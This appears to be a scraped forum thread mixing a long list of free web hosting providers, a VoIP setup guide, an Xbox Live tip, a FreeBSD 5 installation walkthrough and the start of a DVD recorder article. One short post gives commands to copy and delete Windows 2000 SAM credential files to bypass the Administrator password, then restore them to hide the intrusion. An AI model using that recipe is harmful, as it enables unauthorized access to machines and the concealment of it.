Mail, FTP, CGI, Perl, SSI, PHP, ASP (FrontPage), MySQL, CPanel, and many, many more. You really will be your own webmaster. Our thoughtful and patient staff will guide you. Forums for when you seek the help of your peers. Emergency contacts for when you need concentrated one-on-one help.

What's the catch? There isn't one. PortalWorlds.NET is advertising and sponsor supported. Your site will show ads (your choice as to placement, side towers, top banners, popups, and similar) and earn money to cover PortalWorlds.NET's server and administrative costs. You do agree to do nothing offensive nor illegal.

In addition to the many things mentioned, you will also receive a Script Center (crammed with ready to use Perl), 100M diskspace, 250M bandwidth, 1 MySQL database, unlimited POP3 mailboxes (including autoresponders and forwarders), 1 mail list, Oscommerce package, PHP-Nuke, Invision Board, full CPanel.

.Only the registered members can see the link thank "agresssor" for this one

GreatNow
USA, English
Hosting category: REG,BUSINESS,GAME,OTHER
Only the registered members can see the link

Space 100 MB
Upload FTP Browser
Editor Advanced Basic
Ads Banner/Popup
Webaddress Subdomain
Features Domainhosting Subdomain Counter Form Guestbook

Beige Tower
USA, English
Hosting category: REG,BUSINESS,GAME,OTHER
Only the registered members can see the link

Space 100 MB
Upload FTP
Editor Advanced Basic
Ads No ads
Webaddress domain
Features PHP POP Email Domainhosting Telnet mySQL SSI CGI-BIN Guestbook

Comet Stream
Canada, English
Hosting category: REG,BUSINESS,GAME,OTHER
Only the registered members can see the link

Space 50 MB
Upload FTP Browser FrontPage
Editor Advanced Basic
Ads No ads
Webaddress Subdomain, Domain
Features PHP POP Email Domainhosting Subdomain mySQL SSI CGI-BIN Shopping Cart Counter Form Guestbook

1ASPHost
USA, English
Hosting category: REG,BUSINESS,GAME
Only the registered members can see the link

Space 100 MB
Upload Browser
Editor Advanced
Ads Popup
Webaddress /you
Features ASP SSI

Alexus Media
USA, English
Hosting category: REG,BUSINESS,GAME,OTHER
Only the registered members can see the link

Space 999 MB
Upload Browser
Editor Advanced Basic
Ads Popup
Webaddress directory
Features RealVideo RealAudio ASP SSI Guestbook

Angel Towns
USA, English
Hosting category: REG,BUSINESS
Only the registered members can see the link

Space 50 MB
Upload Browser
Editor Advanced Basic
Ads No ads
Webaddress /members/you
Features Guestbook

Brinkster
USA, English
Hosting category: REG,BUSINESS,GAME
Only the registered members can see the link

Space 30 MB
Upload Browser
Editor Advanced
Ads Bannerad
Webaddress /you
Features mySQL ASP

FreeWebz.com
USA, English
Hosting category: REG,BUSINESS
Only the registered members can see the link

Space 100 MB
Upload Browser
Editor Advanced Basic
Ads No ads
Webaddress /you
Features POP Email Domainhosting SSI Shopping Cart Counter Form Guestbook

Illusionfxnet
USA, English
Hosting category: REG,OTHER
Only the registered members can see the link

Space 250 MB
Upload Browser Email
Editor Advanced Basic
Ads No ads
Webaddress Subdomain and Domain
Features PHP POP Email Domainhosting Subdomain Telnet mySQL SSI CGI-BIN Shopping Cart Counter Form Guestbook

Internations
USA, English
Hosting category: REG
Only the registered members can see the link

Space 100 MB
Upload Browser
Editor Advanced Basic
Ads Topbanner
Webaddress /area/you
Features Form Guestbook

Snake INC
USA, English
Hosting category: REG
Only the registered members can see the link

Space 100 MB
Upload FTP Browser
Editor Advanced Basic
Ads Banner + text
Webaddress Subdomain
Features PHP POP Email Domainhosting Subdomain mySQL SSI Counter Form Guestbook

Sphosting.com
USA, English
Hosting category: REG
Only the registered members can see the link

Space 35 MB
Upload Browser
Editor Advanced Basic
Ads Pop-under
Webaddress Subdomain
Features Subdomain SSI Form Guestbook

Totalfreehost
USA, English
Hosting category: REG
Only the registered members can see the link

Space 50 MB
Upload FTP Email
Editor
Ads No ads
Webaddress Domain
Features PHP Domainhosting mySQL CGI-BIN

USALL
USA, English
Hosting category: REG,BUSINESS,GAME
Only the registered members can see the link

Space 3000 MB
Upload Browser
Editor Basic
Ads Banner
Webaddress /members/you
Features Form

Web1000
USA, English
Hosting category: REG
Only the registered members can see the link

Space 50 MB
Upload FTP
Editor Advanced
Ads No ads
Webaddress Subdomain
Features PHP POP Email Domainhosting Subdomain SSI Counter Guestbook

webspace4free.biz
USA, English
Hosting category: REG,BUSINESS,GAME
Only the registered members can see the link

Only the registered members can see the link
*new website just launched seems quite successful*
Space 200 MB
Upload Browser
Editor
Ads No ads
Webaddress Subdomain
Features PHP Domainhosting Subdomain mySQL CGI-BIN
NO Banner Advertisements
35mb Disk Space
Free Webmail Account
Free Subdomain - (yourname.nexuswebs.net)
Online Website Builder
Multi-Platform Template Editor
Website Template Library
24/7 FTP Access
Online File Manager
Email Virus Protection
Spam Filters
Message Board
Guest Book
Site Counter

Only the registered members can see the link
50 MB webspace
NO Filesize limit
NO monthly transfer limit
PHP4.1 / MySQL (phpmyadmin) / counter / guesbook / personalised cgi feedback froms / customisable 404 error pages / FTP access

Only the registered members can see the link
Q.Which files are accepted?
A.Currently we support standard html and images files, which means .htm, .html, .pdf, .gif, .jpg ,.png , .js, .css, .swf, .mid, .jar and .class. The size of your individual files should be < 85kb. Files exceeding this size will get automatically deleted. Besides that, there's no limit on the number of files you can host in your account.

Provider: DK3
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Max file size: 400KB (I agree this sucks)
Comments: The following things are supported, FTP, MySQL, PHP, Perl, SSI, WAP. Plus pre-made portal and forum are available free.
*Update*

Provider:Free Web Hosting
Service: 100 Megs of webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary:100 Megs Of Webspace, Free Site Promotion,FTP Support,Free Stats and Site Tools,
Unlimited Bandwidth,Free Guestbook, Fast and Reliable Servers,and Front Page Extensions.

Provider: Free Webs
Service: 100 Megs of space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: 100 megs of space, No banners of popups,Web Page Editing and HTML editing,FreeWebs Builder,
Site stats, Chatrooms,Guestbook, Counters, Site promotion, Form builder/Mailer, Photoalbums and more.

Provider: USALLportal
Service: 3 gigs of space
URL:Only the registered members can see the link
Summary: 3 gigs of space! What else is there to know.

Provider:3hosting
Service: Unlimited Space
URL:Only the registered members can see the link
Summary: Free hosting for adult sites, FTP access, Unlimited size of sites, Unlimited traffic, Quick Internet connection, TGP compatibility,
Free hosting of your domain.

Provider: HostUltra
Service: Unlimited space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Unlimited Data Transfer
Unlimited Disk Space, 100mbps Network Connection, 99.9% Uptime, Free Sub Directory,
Free Domain Hosting, Custom Domain DNS Control, Browser and FTP Uploading,PHP,
Hosting for Unlimited Domains w/ Unlimited Subdomains, Free Search Engine Submission,
and NO ADS ON PAGES!

Provider:Crosswinds
Service: Unlimited webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Unlimited WebSpace, Web Based Email, Popups, $1 Premium Referral Reward, and more.

Provider:1AspHost
Service:100 Mb space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary:100 MB of Web Space, Unlimited Bandwidth, Instant Account Activation,
Online Control Panel, Online Zip/Unzip Capability, Active Server Pages Version 3.0,
MS Access Database Connectivity.

Provider:Eccentrix
Service: 50 Mb space
URL:Only the registered members can see the link
Summary: 50 MB Web Space,<font color=#3A4F6C><font color=#3A4F6C><b> WWW Board,</font></b></font> Guest Book, Form Mail, WYSIWYG Web Editor,
Excellent Support, and more.

Provider: Neopages
Service: 50 Mb space
URL:Only the registered members can see the link
Summary: 50 Mb space, Unlimited bandwidth, POP E-Mail, True FTP Accounts ,
Site Admin Control Panel,

Provider: Internations Global Web Services
Service: 100 Mb space
URL:Only the registered members can see the link
Summary: 100 Mb space, 1 GB bandwith, Web Message board, Guestbook,
FormMail script and more.

Provider: I12
Service: 800 Mb space
URL:Only the registered members can see the link
Summary: 800 Mb space, unlimited POP3 and alias email addresses,
definetly a site to check out!

Provider: Nerd Cities
Service: 100 Mb space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary:100 Megabytes Web Space, GuestBook+Counters, Full Technical Support,
Unlimited File Size Web Control Panel, No Bandwidth Limits And more!

Provider: DK3
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Max file size: 400KB (I agree this sucks)
Comments: The following things are supported, FTP, MySQL, PHP, Perl, SSI, WAP. Plus pre-made portal and forum are available free.

Only the registered members can see the link
-You have UNLIMITED disk space and bandwidth with your site!.
-You can only upload files with .html, .htm, .jpg, .gif, .css, .js, .png, .pdf
file name extensions.
-Size of every file could not large than 85K bytes.

Only the registered members can see the link
->How much space do I get?
-Unlimited
->How can I upload my files?
-We offer full FTP access. The best FTP client can be found here.
->Can I use PHP or CGI?
-No.
->Can I host movies?
-No.
->Can I have my pages in non-english language?
-No.
->What is the maximum number of files?
-Unlimited.
->What is the maximum file size?
-80KB

->Only the registered members can see the link
site for sale

->Only the registered members can see the link
Worldzone Free - 50mb space, allowed file types (au, mid, midi, wav, gif, ico, jpg, jpeg, png, htm, html, shtml, wml, xml, css, class, jar, java, dat, txt, tmpl, htaccess, htpasswd, js, map, swf, ttf). Sorry but no cgi, ftp, MySQL on our Free accounts. 1 468x60 banner will be located on the bottom of your page but can be removed in our $12 yearly Plus Package.

->Only the registered members can see the link
50 mb space

->Only the registered members can see the link
20 MB of disk space – Have room for your image files, MP3s, video clips.
1 GB of Monthly Bandwidth – More people can visit your site more often

-><font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
page don't load

->Only the registered members can see the link
now it's freecoolpages.com
10MB OF DISK SPACE
UNLIMITED BANDWIDTH
FTP ACCESS FOR UPLOADING
FREE EMAIL

->Only the registered members can see the link
60 mb of space!
Your website may not contain or refer to sites with the following content: Porn, warez, hack or anything encouraging any kind of illegal activities or racism.

->Only the registered members can see the link
25 megs of webspace
Easy homepage creator
Unlimited bandwidth
Your own messageboard
Templates
Free Guestbook
Advanced editor
No fees - 100% FREE!
Fast servers

Provider:POHost
Service: Unlimited Disk Space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Unlimited disk space, Unlimited transfers, Fast servers,Real FTP Uploads,
Domain name hosting TGP Compliant, and more.

Provider:Free Web Hosting
Service: Unlimited Disk space
URL:Only the registered members can see the link
Summary:Unlimited disk space,Unlimited transfers, FAST Servers ,Domain Hosting,
24/7 Real FTP Access,Friendly Support, Web Email, FREE Web Promotion.

Provider: Zoom Fast
Service: Unlimited Space
URL:Only the registered members can see the link
Summary: Unlimited space,Unlimited bandwith, High speed servers and more

URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Offering a great 50 MB of space plus other features like Email Forms, Guestbooks and even Message Boards. Funny name I'm sure you will agree yet worth a look because of the nice amount of space!

Provider: Worldzone.net
Service: 100 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Offering a fantasic 100 MB why not give them a go! They do not accept Warze & Porn sites so dont try to host your page here if you plan to run such a page. However, because of the amount of space they are offering then would make for a great place to dump your files!

Provider: WebJump
Service: 25 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: WebJump is another Small Business Provider offer a huge 25 MB for your website and unlimited bandwidth! Unlike B-City.com WebJump support the use of FTP Updates along with the use of Flash, JavaScript, WAV Files and other things as well. If you like using Email please note WebJump at this time do not offer either POP or Web Based Email Services

Provider: Web1000
Service: 25 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: N/A

Provider: Tripod
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: N/A

Provider: Spree.com
Service: Unlimited Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Offering counters, builders, uploaders, HTML guide and a unlimited MB account spree.com could be a great place for junk files. If your running a Warze related website, try these guys out and tell me what you think!

Provider: SimplyCities
Service: 30 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Simplycities.com have just had a change in servers hence speed should be and better be at an all time high. On the website they claim to offer Unlimited Bandwidth yet at the end of that they have a little * displaying the fact conditions apply yet we could not find on the page details of this!?! Anyway they could be worth a look if just starting out!

Provider: Server2000.at
Service: Unlimited Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Only problem with this is it's not english.

Provider: Qwik Pages
Service: 100 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: N/A

Provider: Netomia
Service: 60 MB Webspace, Online Editor, Counter, Form Mail, Guestbook
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: One of the few providers offering such huge space limits with a string of other great features need for any good website!

Provider: JustFree.com
Service: 40 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Offering 40 MB and no bandwidth limit this should be a good choice in web hosting. They also offer free forums, live support, free guestbook & soon Free Email! We have been unable to test this provider 100% hence comments are welcome!

Provider: InfoCache
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: InfoCache offers a fantastic 50 MB of webspace which is great for any small business or personal website. They are now begining to offer Free Email and also offer a range of "pay" service which are very cheap compared to some providers. Worth a look just for the space!

Provider: FreeHomePages
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: They claim fast and stable server with offers of chat, form mailer, guestbooks, page builders, unlimited bandwith & unlimited hits to get the visitors in and when they offer this much space why not go for them!

Provider: Dynahost.net
Service: 25 MB Webspace [ 100 MB After Approval ]
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Providing a nice amount of space with the option of increasing to 100 MB unlike most providers. Dynahost accounts also come with forums & a guestbook which is all updated able via your Web Browser!

Provider: Dreamwater
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Offer 50 MB, Guestbook, Chat, Form Mailer, Web Templates, Builder, Clip Art, Search Submissions, Subdomain & Short URL, Unlimited Band * no hit limit! Because they offer so much we think they could have a large number of member hence a slow service yet you should test them for yourself

Provider: Dencity
Service: 25 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Dencity is a well known provider offering a great 25 MB which is fantastic for any small user. They also offer a range of tools for its members plus a listing of HTML Code to help you along!

Provider: Atmosphere.be
Service: Webspace [Unlimited?] & 5 MB Email
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: No Information

Provider: AFreeHome.com
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: AFreeHome.com make out (in a round-about way) they hate Geocities.com! With the huge space they offer and no bandwidth limit they could be one of the best providers to date! They also claim to pay you US$10 for people you get to Sign Up yet this seems a little funny we think. Anyway - try them and inform us of how good/bad they are.

Provider: Above World
Service: 25 MB Webspace [Possible 60 MB of space]
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: Above World claim to offer a 100% Free Virtual Domain along with 25 MB of webspace plus chat board and guestbook! When checking the above details on the Above World Website they listed via text they offer 25 MB yet a visible banner said 60 MB. We can provide no further information.

Provider: 50megs
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: 50megs.com is only one of a few providers offering such huge amounts of webspace for free. It comes with other services like Web Polls, counters and much more.

Provider: 00server
Service: 20 MB Webspace [Short URL Provided]
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Summary: 00server offers a wide range of domains to suite most styles of websites. Along with the short domain names you get a fantastic 20 MB for your website. Known for its fast service yet the banner is always a down side to any provider!

Provider: 1and1
Service: 500 MB web space
5,000 MB/month traffic ($.99 per GB for additional traffic)
site statistics, log files, ready-to-run CGI-library, own CGI programming (Perl, Python), FrontPage 2002 extensions
Advanced Password Protection
5 FTP accounts
PHP3 & PHP4 MySQL
Proxy SSL Secure Server
Cron Jobs
SSH Secure Shell Access
URL:<font color=#3A4F6C><font color=#3A4F6C><b> Only the registered members can see the link></b></font>
Periodical time limited offers

PunoSoft Mail:
Only the registered members can see the link
-You can check email via website, OR I can give you the details on how to configure Outlook or Outlook Express for mail retrieval/send.
PunoSoft Gallery:
Only the registered members can see the link
-Great for sharing photos or "Signatures".
-Sign Up and I'll send you details on how to upload your photos and how to access them.

PunoSoft Web Host:

Only the registered members can see the link

125MB Hosting Service - Only the registered members can see the link

XAXAX FREE HOSTING - Only the registered members can see the link

FREE HOSTiNG @ HOSTARS - Only the registered members can see the link

CyberFreeHost - Only the registered members can see the link

ULTRA FREE HOST - Only the registered members can see the link

20forfree.com :: Free Web Hosting - Only the registered members can see the link

HentaiRack.com :: FREE HEntai Web Hosting - Only the registered members can see the link

EZ SEX HOST Free Adult Hosting - Only the registered members can see the link

Master
29-04-07, 09:38
Free World Dialup

Free World Dialup - Only the registered members can see the link
"Use FWD to make real, free phone calls using your favorite telephone, computer or PDA and any broadband connection. Call your neighbor or a relative, next door or in another country; all with the same ease, speed, and high quality." Thanks to Jeff Pulver and his crew!

Quick summary:

1 - First, got to Only the registered members can see the link and sign up to get your FWD # and password.
2 - Download Only the registered members can see the link FWD/X-Lite ("self-configures") program or go to Only the registered members can see the link to call any FWD # and U.S. toll free #s using Internet Explorer (Firefox not supported).

Quickstart Guide: Only the registered members can see the link
FWD Xlite Configuration Guide: Only the registered members can see the link
MS Windows Messenger Configuration Guide: Only the registered members can see the link (FWD supports Windows Messenger 4.6/4.7 but not MSN Messenger 5.x.)

3 - To call a U.S. landline/cell #, dial *+arecode+7digit#. (This FWD feature is not listed on their website, but has been working for several months now.)

4 - To call a FWD # from a PSTN (your regular phone), click
Only the registered members can see the link or after you've signed up go to FWD web page, click on "Features", "Access #s" for a list of FWD access numbers in your area. Available in several states in the U.S., UK, NL and DE at this time.

Packet8:
-- To call a P8 phone # from a FWD phone: Dial **898 + 1 + P8 number to be routed to P8 service.
-- To call a FWD # from a P8 phone:
*If the FWD # you are calling contains 5 digits, start to dial with the prefix 0351. For example: 035112345
*If the FWD # you are calling contains 6 digits, start to dial with the prefix 0451.

Call UK:
Get a UK telephone # that will call you on your FWD #. Register Only the registered members can see the link

FWD Features: Some features like Voice email needs to be activated at Only the registered members can see the link

Internet Calling
Call Waiting
CallerID
Missed Call notification
Call Forwarding
Call Transfer
Three Way Calling
Voice email
SoftPhone, IP Phones & *Web-based
Aliases
Whitepages directory
ENUM Entry
eDial SOAP
Conferencing
Instant Messaging
Web Calling/FWD-Talk
Corporate Cisco Call Manager Connection
Calling to Toll Free Numbers in the UK, US, NL, JP and FR TellMe Service (411).
-- NL Dial *31(800)... to reach Netherlands toll free #s.
-- UK Dial *44(800)... or *44(808)... or *44 (500) to reach UK toll free #s.
-- US Dial *1(8xx) xxx xxxx to reach United States toll free #s.
-- JP Dial *81 0120... to reach Japan toll free #s.

Frequently used numbers
613 Echo test
55555 Volunteer Welcome Line
514 FWD Coffee House
612 Time
411 TellMe Information
611 Part Time Technical support
511 FWD Conference Bridge

At the moment, I think this is way better than Skype, Yahoo IM voice chat, etc...I've been using FWD for over a year with my cable broadband service and didn't have to set up any port forwarding on my broadband router. Obviously you'ld need a mic/speakers connected to your PC.

You can also use your regular telephone via an adapter Only the registered members can see the link and IP phone Only the registered members can see the link Adapters and IP phones from different vendors like Cisco are available.

* Broadbandreports.com VoIP forum (formerly known as DSLReports.com)
-- If you have any questions or just curious about VoIP, visit the VoIP forum Only the registered members can see the link at DSLReports.com.

Master
29-04-07, 09:38
Anyone here think about getting xbox live but not have enough money to pay for the starter kit...

WELL GUESS WHAT!!!!!!!!

You can now get it without paying a cent (that is if you have a free 2 month trial)

First go to Only the registered members can see the link and download the current version of XBConnect...

Secondly you must get a Ethernet cable and connect your X-BOX to your router (if you have, you MUST have one BTW)

Thirdly install and open xbconnect. Create a new account .......

Fourthly go on Only the registered members can see the link and sign in your .NET passport and create a profile for xbox live

Fifthly open your xbox with a xbox live supported game and follow the setup for xbox live ....

And YOUR DONE!!!!!

Master
29-04-07, 09:39
A step-by-step guide to installing FreeBSD 5. It assumes moderate experience with linux and leaves you with a fully updated FreeBSD system.


FreeBSD Installation



A. 5.x vs 4.x
The first thing to understand about FreeBSD is that there are two lines of development. The -STABLE branch is marked with a 4.x version number and the most recent version is 4.10. It is well tested and very solid, but does not include the most recent technology. The -CURRENT branch, marked with a 5.x version, is the “unstable” branch. However, it is nicely stable at the moment and is coming along quite well. Most users should go with 5.x and these instructions are only valid for that tree.

NOTE: DragonFlyBSD ( Only the registered members can see the link ) is a continuation of the 4.x line. It uses lock-less (no mutexes) SMP support and a Light Weight Kernel Threading system. It has a lot of promise and is developing at a breakneck pace, but it should still be thought of as “R/D.”



B. Getting Media
I am not going to say much about this. There are links to various ftp mirrors at Only the registered members can see the link and the directory structure is fairly self-explanatory. There are however several choices for ISO. You should choose the miniinst ISO. It is small and will include everything you need for the base system.




C. Starting Installation
After, the CD boots up you will enter the...ahh.....majestic sysinstall. You can safely ignore most of the options and just choose a standard installation. Most of the install process is pretty easy and anyone who has some experience with linux or unix will be able to handle it without much stress. However, creating partitions and dealing with drives will seem very odd to your standard linux user.




D. Hard Disc Management in FreeBSD
Ok, the first thing to get used to here is that IDE drives are not hda, hdb...etc. They are ad0, ad1 and so forth. SCSI discs are da0, da1...and so on. There is one other thing that is going to freak some people out. You create slices, not partitions, on the disc and then create partitions within those slices. For example, the first partition in the first slice on the first IDE disc would be ad0s1a. Just accept it.




E. Partitioning
Sysinstall will lead you through the partitioning and its fairly easy to understand. The first part will ask you to choose a disc or discs to partition and then will show you a "slice editor." This is where you will create your slice. I advise you to only make one. While multiple slices are easy to deal with, it just adds complication. If this is not your first installation of a BSD type OS, then you can ignore me and why are you reading this again?

After creating your slice, you will be prompted to choose the drive(s) to install an MBR on. The FreeBSD boot loader is nothing to write home about, but it tends towards working. After this step, you can create partitions. There is not much to say here. At the top of the screen it will show your slice(s) and when one of them is selected you can use the controls to create a partition on it. You will need at least a root and swap partition. On the non-swap partitions it is usually a good idea to enable soft-updates.



F. Distribution Sets
This is a simple section, select minimal.




G. Continue Installation
The rest of this is pretty simple. Make sure you install from the CD and not the Internet. The bulk of the install is now done. After it copies files to your disc, it will start the configuration process. This is all pretty self-evident, but there are a couple things you should know.




Network Configuration

Don't be scared by the names, in *BSD devices are named after their drivers. There is also a short description after the name, so you should be able to choose the right one. The rest of the network config is easy, just follow the prompts.




System Console Configuration

You can pretty much ignore this, you may want to look around for your own knowledge and of course you could pick a nice screen saver here, but other then that I would leave it alone for now.




Time Zone

All I have to say here is that if you live in the US, after you choose “America – North and South” hit the end key. The US is at the bottom of the list and hitting end is the quickest way there.




Linux

Say no, we will do this later and with an updated linux_base.




Mouse

OK, welcome to the wonderful and amazing world of moused. Answer the first question truthfully, and then you can tweak the settings in the “Please configure your mouse” dialog. Whatever you do, be sure to enable the daemon. Also, for most users that is all you will have to do. You can safely ignore the other options.




Package Installation

At this point, the installer will ask you to install binary packages. Say no. These binaries are out of date and not included on our CD.



Of users and roots

This isn't the most thrilling section, add a user when it asks you to and set a root password after that. The only thing I have to say about this process is when the new user dialog comes up leave the “Group:” box unchanged and add “wheel” to the Member groups. You also might want to set your shell to /bin/tcsh. As for setting the root password, if you can't handle that we have bigger problems.



Rebooting

Ok, next it will ask if you would like to visit the general config area. Select no and you will be brought back to the main menu. Exit the install, reboot without the CD in and enjoy the boot messages.




H. The Real Post-Install
At this point, I am going to assume that you are now looking at a login prompt and thinking “my my...FreeBSD boots quite quickly doesn't it.” Well, our task is not done yet...there is a reason we did a minimal install. We are going to do most of it ourselves. First, lets upgrade to -CURRENT. This isn't a practice I would usually recommend, but 5.x is close to being tagged stable and -CURRENT is rather solid at the moment. First, I need to explain how things are done in the BSD world.


Sup?


CVS up; you up; we all CVSUP. Cvsup is a very interesting program that I am not going to explain in detail here. All you really need to know is that it updates source trees. You see, that is the thing. You may be used to /usr/src not doing much. In BSD it has a job, it holds the source for the entire base system. However, we did a minimal install and no source is there. It wouldn't be up2date anyway. So, lets fix that. Login as root and type the following: pkg_add -r cvsup-without-gui


pkg_add is the binary installer for FreeBSD and the -r argument tells it to fetch binaries from the net. It will also fetch any deps that you might need. Switch to another console while this is happening and login as root. Do the following:



cd /etc

cp /usr/share/examples/etc/make.conf /etc/make.conf

cp /usr/share/examples/cvsup/standard-supfile /usr

cp /usr/share/examples/cvsup/ports-supfile /usr


chmod u+w /etc/make.conf /usr/standard-supfile /usr/ports-supfile



What was that? Well here is the rundown. Make.conf is the file that controls the building of programs from source on FreeBSD and the supfiles tell cvsup where to get the source for the base system and the ports system, also where to put said source. They come out of /usr/share/examples without the write bit set and that gets annoying. So we set that. Now switch back to the first console and type rehash. This tells tcsh to check its path for new programs. Now, edit the standard supfile that is in /usr. You can either use ee or vi. I like vi. Scroll down to the line that looks a bit odd. It will be something like:




*default host=CHANGE_THIS.FreeBSD.org



The “CHANGE_THIS” is where you put what cvsup server to use. Choose a number between 1 and 9, like 4, and put cvsup4 where CHANGE_THIS is. So it would end up being:




*default host=cvsup4.FreeBSD.org



Now exit your editor and run cvsup /usr/standard-supfile



If everything goes correctly, you will see a lot of text scrolling on the screen. If it says something about a bad connection, try another number.




Make.conf

Now 'tis the time for all good men (and women) to edit their make.conf . This is not difficult, in fact have a look around the file. It may be long, but it is pretty simple. Now, uncomment the CPU setting and the CFLAGS setting. Set the CPU to your CPU (there will be a list in the comments above the setting) and set the CFLAGS to -O2. (NOTE: If the base system fails to build, downgrade your CFLAGS back to -O).




Build Your World

When CVSUP finishes (it will be awhile...go get some coffee), cd to /usr/src and run make buildworld. That command will do exactly what it sounds like. It builds your world, or base system. While its doing that, lets get you a kernel. First, cd to /usr/src/sys/i386/conf then cp GENERIC to some file of your choosing. Any name you want. However, be aware that this is going to show up in a uname -a. Now, crack open your new file and take a look at what a FreeBSD kernel config is like. There are many things you can do here that will improve performance and subtract in size. However, lets keep it simple. Near the top of the file will be the name GENERIC. Change that to your new name. You can now look through the file and you will find several sections that are just for debugging. These will indeed add size and slow down the kernel a bit, but I would leave them for now. Go to the end of the file and make a new line. Add the following:




device pcm



This will add sound support to the kernel. Be aware that you don't need to do this, you can load binary modules at boot or after boot, but this way is easy and sound is used often. Save the file and exit. Go back to your buildworld console and when its done execute make buildkernel KERNCONF=YOUR_KERNEL_CONFIG_NAME



NOTE: NOT THE PATH OF THE KERNEL CONFIG..it knows to look in /usr/src/sys/i386/conf




Installing Your World

This isn't that difficult. First run make installkernel KERNCONF= your config name. Now here is the interesting part. Run mergemaster -p, this program looks through your etc and updates it to match the new /etc in /usr/src. It will display changed files to you, press q and it will give you options. Something like i (install), m (merge) etc. Pick merge and it will open a nice little screen that shows you one file on the right and one on the left. It will go section by section, showing the areas that have changed. Press r or l to choose which section to keep. Its pretty easy to see which section has new stuff and which does not. After the merge, it will prompt you with options for the newly merged file. One of these will be install and this is the one you want. In the latest current, most of what you will be showed is user and group files. Make sure you do select the sections with the new users and groups. After this is done, it will ask you a couple questions that you can say yes to. Now that your /etc is updated run make installworld then reboot.



NOTE: You usually don't need to run mergemaster. However, 5.2.1 is a pretty old release and -CURRENT has come a long way.




I. Ports

Welcome to running current. The rest is easy. cd back to /usr and edit the ports supfile the same way you did the standard one. Run cvsup on it and wait. After its done, you will have a full ports tree. There is not much left to say. You now have a working system and a fully updated one too. To install software from ports cd to /usr/ports/category/softwarename/ and run make install clean . If you want linux binary support, install the linux_base port. To find where it is cd to /usr/ports and run make search name=linux_base | less . Enable loading the kernel modules for linux binary support by editing /etc/rc.conf. Just add the line linux_enable="YES" to the file and your set. If this is a desktop system, I would recommend installing /usr/ports/x11/xorg and your choice of /usr/ports/x11/gnome2 or kde3. Have fun .





Get it from:

Only the registered members can see the link

Master
29-04-07, 09:40
Get in windows 2000 as Administrator.
>
> NOTE: Requires a boot disk.
>
> Get the command prompt and go to C:\winnt\sytem32\config\ and do
the following commands:
> attrib -a -r -h
> copy sam.* a:\
> del Sam.*
>
> reboot the computer. there should be no administrator password.
just put in administrator and hit enter. replace the sam files to
restore the password to hide intrusion.

Master
29-04-07, 09:40
Get the Most Out of Your DVD Recorder


Assoc. Ed. PC World
Melissa J. Perenson

I admit it: I'm a former tape-a-holic. When I began using a VCR some 20 years ago (I ended up teaching Mom and Dad how to program the darn thing back then), I got hooked on the idea of creating my own video library, replete with everything from "Star Trek" episodes to gymnastics competitions.

Recently, however, I stopped recording video on tape and switched to DVD--and I haven't looked back. But after using several DVD recorders, I've identified some quirks and frustrations that are specific to frequent users like myself. Recording to DVD is very different from recording to tape; you encounter new types of hassles ranging from pesky so-called disc preparation times to annoying delays in ejecting discs and the challenge of creating visually appealing menus. The tips that follow are geared towards hardcore videophiles (you know who you are), but they're also applicable to the most casual user.

1. Choosing the Best Recorder for TV

If you've already bought your DVD recorder, skip to tip 2. But if you haven't, be prepared to be confused by a torrent of acronyms and options. DVD+R, DVD+RW, DVD-R, DVD-RW, DVD-RAM, EPGs ... and you thought buying an HDTV would be confusing.

